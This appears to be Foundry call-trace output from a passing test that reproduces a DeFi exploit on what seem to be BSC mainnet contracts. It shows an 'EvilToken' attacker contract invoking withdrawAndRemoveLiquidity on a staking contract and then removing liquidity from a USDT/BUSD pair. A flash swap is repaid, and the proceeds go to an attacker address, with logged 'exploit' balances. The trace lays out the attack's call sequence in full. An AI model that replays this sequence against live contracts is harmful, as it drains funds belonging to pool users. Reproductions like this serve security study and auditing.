    │   │   │   ├─ [1428] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::userInfo(18, EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   ├─ [872] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::userInfo(18, EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 9918921268034103877763 [9.918e21], 6538719907742446925524703 [6.538e24]
    │   │   │   │   └─ ← [Return] 9918921268034103877763 [9.918e21], 6538719907742446925524703 [6.538e24]
    │   │   │   ├─ [238423] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::withdrawAndRemoveLiquidity(18, 9918921268034103877763 [9.918e21], false)
    │   │   │   │   ├─ [237867] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::withdrawAndRemoveLiquidity(18, 9918921268034103877763 [9.918e21], false) [delegatecall]
    │   │   │   │   │   ├─ [601] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 278987357078591710521671867 [2.789e26]
    │   │   │   │   │   ├─ [42467] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::transfer(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 0)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 0)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa02731d9110542b2819018b64cddd34ba6326320cfe2cd46626edc6a3e920f31: 0 → 0x0000000000000000000000000000000000000000000000000000000000f44458
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [2586] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::approve(0x49a6FD247022e073AcD740225304270274BA3075, 0)
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x49a6FD247022e073AcD740225304270274BA3075, value: 0)
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [926] 0x49a6FD247022e073AcD740225304270274BA3075::47c7357b(0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b00000000000000000000000043feaca246392c23ee5a0db618fcd81a74b917260000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   │   ├─ [370] 0xc7D4253E79FD16D3d24b674899D97F2d953d0029::47c7357b(0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b00000000000000000000000043feaca246392c23ee5a0db618fcd81a74b917260000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ [22410] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::approve(0x49a6FD247022e073AcD740225304270274BA3075, 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x49a6FD247022e073AcD740225304270274BA3075, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [39309] 0x49a6FD247022e073AcD740225304270274BA3075::539e90f8(0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b0000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c000000000000000000000000000000000000000000000219b4af44946fe72083)
    │   │   │   │   │   │   ├─ [38747] 0xc7D4253E79FD16D3d24b674899D97F2d953d0029::539e90f8(0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b0000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c000000000000000000000000000000000000000000000219b4af44946fe72083) [delegatecall]
    │   │   │   │   │   │   │   ├─ [26736] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x49a6FD247022e073AcD740225304270274BA3075, 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x49a6FD247022e073AcD740225304270274BA3075, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0x000000000000000000000000000000000000000000000002b0436fb3f133135c → 0
    │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000002a6870dd58afe6f97536 → 0x000000000000000000000000000000000000000000002a65c099e8fbf5c661da
    │   │   │   │   │   │   │   │   │   @ 0x9f061f44f844022a7ced68b2e4d2dcc2f54ad18a6d158ef0188c7f6e8b8255ce: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [3188] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transfer(0xb048DD82f0Ec1c52FD2965aE7Cee273d75CE3023, 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x49a6FD247022e073AcD740225304270274BA3075, to: 0xb048DD82f0Ec1c52FD2965aE7Cee273d75CE3023, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x9f061f44f844022a7ced68b2e4d2dcc2f54ad18a6d158ef0188c7f6e8b8255ce: 0x000000000000000000000000000000000000000000000002b0436fb3f133135c → 0
    │   │   │   │   │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb → 0x00000000000000000000000000000000000000000000001e82d56e39ff5fa417
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─  emit topic 0: 0xa3d2f08ae96a7de361b4da83bb78eb768211a181b0425e02dd0bcda7088a722f
    │   │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000b048dd82f0ec1c52fd2965ae7cee273d75ce3023
    │   │   │   │   │   │   │   │        topic 2: 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000003
    │   │   │   │   │   │   │   │           data: 0x0000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb → 0x00000000000000000000000000000000000000000000001e82d56e39ff5fa417
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ [605] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [22410] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::approve(0x48Bb5f07e78f32Ac7039366533D620C72c389797, 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0 → 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [449] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   │   │   │   │   ├─ [381] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::token1() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56
    │   │   │   │   │   ├─ [91313] 0x48Bb5f07e78f32Ac7039366533D620C72c389797::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 9869326661693933358375 [9.869e21], 1, 1, EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 1647130467 [1.647e9])
    │   │   │   │   │   │   ├─ [23936] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000002a65c099e8fbf5c661da → 0x00000000000000000000000000000000000000000000284ebc2e141b771254b3
    │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27 → 0
    │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0 → 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [64832] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::burn(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 202539491187671633617452 [2.025e23]
    │   │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 202830584196231560435466 [2.028e23]
    │   │   │   │   │   │   │   ├─ [338] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: 0x0000000000000000000000000000000000000000, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 9935720223374354978984 [9.935e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 9935720223374354978984 [9.935e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002ae3b014d6f8d791e22c → 0x0000000000000000000000000000000000000000000028c91243b183d2594984
    │   │   │   │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000000021a9dd12575053898a8
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [23171] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 9950000000000000000000 [9.95e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 9950000000000000000000 [9.95e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002af377cef3fafdc0170a → 0x0000000000000000000000000000000000000000000028d813d1d956fd08170a
    │   │   │   │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000000021b63fd1aa400b80000
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 192603770964297278638468 [1.926e23]
    │   │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 192880584196231560435466 [1.928e23]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 192603770964297278638468 [1.926e23], reserve1: 192880584196231560435466 [1.928e23])
    │   │   │   │   │   │   │   ├─ emit Burn(sender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, amount0: 9935720223374354978984 [9.935e21], amount1: 9950000000000000000000 [9.95e21], to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27 → 0
    │   │   │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000002a9a5171b574a06185c8 → 0x0000000000000000000000000000000000000000000028834d05e09421ad78a1
    │   │   │   │   │   │   │   │   @ 8: 0x622d350b000000002af377cef3fafdc0170a000000002ae3b014d6f8d791e22c → 0x622d350b0000000028d813d1d956fd08170a0000000028c91243b183d2594984
    │   │   │   │   │   │   │   └─ ← [Return] 9935720223374354978984 [9.935e21], 9950000000000000000000 [9.95e21]
    │   │   │   │   │   │   └─ ← [Return] 9935720223374354978984 [9.935e21], 9950000000000000000000 [9.95e21]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4240b115d3574d496278014261310cc0896167bef97ca0867c8a023d98f4de51: 0x0000000000000000000000000000000000000000000568a0b76a14ecf4a62edf → 0
    │   │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb → 0x00000000000000000000000000000000000000000000001e82d56e39ff5fa417
    │   │   │   │   │   │   @ 0x4240b115d3574d496278014261310cc0896167bef97ca0867c8a023d98f4de50: 0x000000000000000000000000000000000000000000000219b4af44946fe72083 → 0
    │   │   │   │   │   │   @ 0x8766097a2ede1c4002a90c813bc6572b42330a7996158a3c747c5fb5111bbe7f: 0x000000000000000000000000000000000000000000003145d5f77e39a1ce31d2 → 0x000000000000000000000000000000000000000000002f2c214839a531e7114f
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   └─ ← [Return] 9935720223374354978984 [9.935e21]
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9935720223374354978984 [9.935e21])
    │   │   │   │   ├─ emit Transfer(from: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9935720223374354978984 [9.935e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021a9dd12575053898a8 → 0x0000000000000000000000000000000000000000000004353ba24aea0a713150
    │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000000021a9dd12575053898a8 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   └─ ← [Return] 9950000000000000000000 [9.95e21]
    │   │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9950000000000000000000 [9.95e21])
    │   │   │   │   ├─ emit Transfer(from: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9950000000000000000000 [9.95e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021b63fd1aa400b80000 → 0x000000000000000000000000000000000000000000000436c7fa354801700000
    │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000000021b63fd1aa400b80000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021a9dd12575053898a8 → 0x0000000000000000000000000000000000000000000004353ba24aea0a713150
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, 10025062656641604020000 [1.002e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, value: 10025062656641604020000 [1.002e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000004353ba24aea0a713150 → 0x000000000000000000000000000000000000000000000215c5f10fc1cdccca30
    │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x000000000000000000000000000000000000000000777efb726a0697faec4ad4 → 0x00000000000000000000000000000000000000000077811ae81b41c03790b1f4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, 10025062656641604020000 [1.002e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, value: 10025062656641604020000 [1.002e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000007778f33737f5b7e9696951 → 0x000000000000000000000000000000000000000000777b12ace930e0260dd071
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000436c7fa354801700000 → 0x0000000000000000000000000000000000000000000002175248fa1fc4cb98e0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 9846377790107105937968 [9.846e21]
    │   │   ├─ [25171] 0x55d398326f99059fF775485246999027B3197955::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 9846377790107105937968 [9.846e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 9846377790107105937968 [9.846e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000215c5f10fc1cdccca30 → 0
    │   │   │   │   @ 0xb53a84ec1ee7a49449242f87552fe8904cecf7ffd7a575af2eea66701d852966: 0 → 0x000000000000000000000000000000000000000000000215c5f10fc1cdccca30
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 9874937343358395980000 [9.874e21]
    │   │   ├─ [25171] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 9874937343358395980000 [9.874e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 9874937343358395980000 [9.874e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000002175248fa1fc4cb98e0 → 0
    │   │   │   │   @ 0xb53a84ec1ee7a49449242f87552fe8904cecf7ffd7a575af2eea66701d852966: 0 → 0x0000000000000000000000000000000000000000000002175248fa1fc4cb98e0
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x000000000000000000000000000000000000000000777efb726a0697faec4ad4 → 0x000000000000000000000000000000000000000000777b12ace930e0260dd071
    │   │   │   @ 0x511d19af8e36e5f64240fd7cf81c796a3388caf63a9b1ec2bee4d9aaeaefde77: 0 → 0x0000000000000000000000000000000000000000000568a0b76a14ecf4a62edf
    │   │   │   @ 0xb53a84ec1ee7a49449242f87552fe8904cecf7ffd7a575af2eea66701d852966: 0 → 0x000000000000000000000000000000000000000000000215c5f10fc1cdccca30
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021b63fd1aa400b80000 → 0x000000000000000000000000000000000000000000000436c7fa354801700000
    │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 144471854150810907463168500 [1.444e26]
    │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 144443368112470748289683569 [1.444e26]
    │   ├─ emit Sync(reserve0: 144471854150810907463168500 [1.444e26], reserve1: 144443368112470748289683569 [1.444e26])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 10025062656641604020000 [1.002e22], amount1In: 10025062656641604020000 [1.002e22], amount0Out: 10000000000000000000000 [1e22], amount1Out: 10000000000000000000000 [1e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 10: 0x000000000000000000000000000001aa51e2dcdfd3476a708a70b47b01ae4bb7 → 0x000000000000000000000000000001aa51ebdd5425600a9ffdf76d2251b35564
    │   │   @ 8: 0x622d3502000000777b115118bf729ba969510000007781198c4ad052ad2c4ad4 → 0x622d350b000000777b12ace930e0260dd07100000077811ae81b41c03790b1f4
    │   │   @ 9: 0x000000000000000000000000000001aa6efa32da1a5a6630dcf8d44849860bb1 → 0x000000000000000000000000000001aa6f033265ce20ddbf356c47c5c3bd218e
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 9846377790107105937968 [9.846e21]
    ├─ emit log_named_uint(key: "Before exploit, Dai balance of attacker:", val: 9846377790107105937968 [9.846e21])
    ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 9874937343358395980000 [9.874e21]
    ├─ emit log_named_uint(key: "After exploit, Dai balance of attacker:", val: 9874937343358395980000 [9.874e21])
    ├─  storage changes:
    │   @ 36: 0 → 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   @ 35: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 33.06s (31.52s CPU time)

Ran 2 test suites in 34.13s (33.66s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
